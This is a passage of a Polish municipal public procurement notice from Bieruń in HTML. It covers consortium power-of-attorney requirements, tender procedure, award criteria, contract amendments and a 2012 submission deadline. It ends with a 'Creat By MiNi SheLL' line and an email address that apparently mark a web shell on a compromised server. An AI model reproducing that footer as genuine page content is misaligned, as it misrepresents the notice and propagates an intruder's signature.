        od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej  sytuacji  
        zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami   niezbędnymi do  
        realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych  
        podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy   
        wykonywaniu zamówienia.
       Treść zobowiązania podmiotu trzeciego złożonego w oryginale, powinna określać:
         -  kto jest podmiotem przyjmującym zasoby,
         -  zakres zobowiązania podmiotu trzeciego,
         -  czego dotyczy zobowiązanie,
         -  w jaki sposób będzie zobowiązanie wykonane,
         -  jakiego okresu dotyczy zobowiązanie.
     5.  Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów     dotyczących       
          sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może    przedstawić inny  
          dokument, który w wystarczający sposób potwierdza spełnienie opisanego przez zamawiającego  
          warunku.
 6.  W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. konsorcjum/  
      spółki cywilnej) do oferty należy dołączyć : 
a)	Pełnomocnictwo  określające zasady reprezentacji ze wskazaniem pełnomocnika ( lidera),  
jego zakresu działania  i   uprawnień do reprezentowania wykonawców w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy. 
Pełnomocnictwo  winno zawierać, w szczególności  :
-  nazwy wszystkich wykonawców  wspólnie ubiegający się o realizację  zamówienia  i 
   udzielających pełnomocnictwa, 
-  nazwę firmy Pełnomocnika/Lidera,
-  zakres działania Pełnomocnika/Lidera, uprawnień do reprezentowania wykonawców                        
   w   postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia  
   umowy, 
-  czas trwania ( zawiązania umowy wykonawców wspólnie ubiegających się o udzielenie  
   zamówienia tzn. co najmniej okres obejmujący realizację zamówienia)  ,
-  cel zawarcia ( wspólną realizację zamówienia publicznego),
-  datę udzielenia pełnomocnictwa,
-  podpisy wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia,   
   zgodne z zasadą ich reprezentacji.
Pełnomocnictwo należy załączyć w formie oryginału lub notarialnie poświadczonej kopii. Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem / Liderem. 
          b) Oświadczenia wymienione w pkt. V.A SIWZ powinny być złożone w taki sposób, aby warunki ,                
              o których mowa w pkt. IV SIWZ, wykonawcy występujący wspólnie spełnili łącznie.  
          c) Dokumenty wymienione w pkt. V B ppkt. 1 i 2 Listy wymaganych dokumentów, powinny być 
              złożony w taki sposób, aby warunki o których mowa w pkt. IV SIWZ, wykonawcy występujący 
              wspólnie spełnili łącznie. 
          d) Dokumenty wymienione w pkt. V B ppkt. 3 i 4 Listy wymaganych dokumentów składa każdy                           
              z wykonawców wchodzących w skład podmiotu występującego wspólnie. 
          e) Kopie dokumentów dotyczących wykonawcy powinny być poświadczane za zgodność 
              z oryginałem przez wykonawcę, którego dokument dotyczy lub przez lidera lub przez 
              wszystkich  wykonawców wchodzących w skład tego podmiotu.
Do oferty zaleca się załączyć informacje  w zakresie :
    Części zamówienia, która zostanie powierzona podwykonawcom. W przypadku braku 
    złożenia informacji w tym zakresie, zamawiający uzna, że wykonawca wykona całość 
    zamówienia sam bez powierzenia części zamówienia podwykonawcom</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany zawartej z wykonawcą umowy w zakresie:
a.	Wartości umownej, w przypadku wprowadzenia zmian VAT, który będzie naliczany zgodnie     z obowiązującą stawką. 
b.	Zmiany osób, które będą uczestniczyć w wykonywaniu przedmiotu umowy z zachowaniem
wymagań określonych w SIWZ, jakie osoby te powinny spełniać.
c.	Zmiany terminu rozpoczęcia lub zakończenia wykonania przedmiotu umowy, 
w szczególności zmiany terminów wykonywania robót budowlanych z powodu: niesprzyjających warunków atmosferycznych; zmiany przepisów; braku możliwości zakupu materiałów i urządzeń niezbędnych do prowadzenia robót;  okoliczności, których nie można było przewidzieć przy udzielaniu zamówienia; siły wyższej.
d.	Mającym wpływ na realizację przedmiotu umowy, w przypadku gdy nastąpi zmiana
powszechnie obowiązujących przepisów prawa.
e.	Innych zmian, których nie można było przewidzieć na etapie sporządzania SIWZ, a które               
                nie wykraczają poza zakres art. 140 ustawy pzp.
f.	Zmiany podwykonawcy lub zatrudnienia podwykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bierun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Bieruniu - Referat Zamówień Publicznych
43-150 Bieruń, ul. Rynek 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.08.2012 godzina 10:00, miejsce: Urząd Miejski w Bieruniu - SEKRETARIAT (pokój nr 9, I piętro, segment A)
43-150 Bieruń, ul. Rynek 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com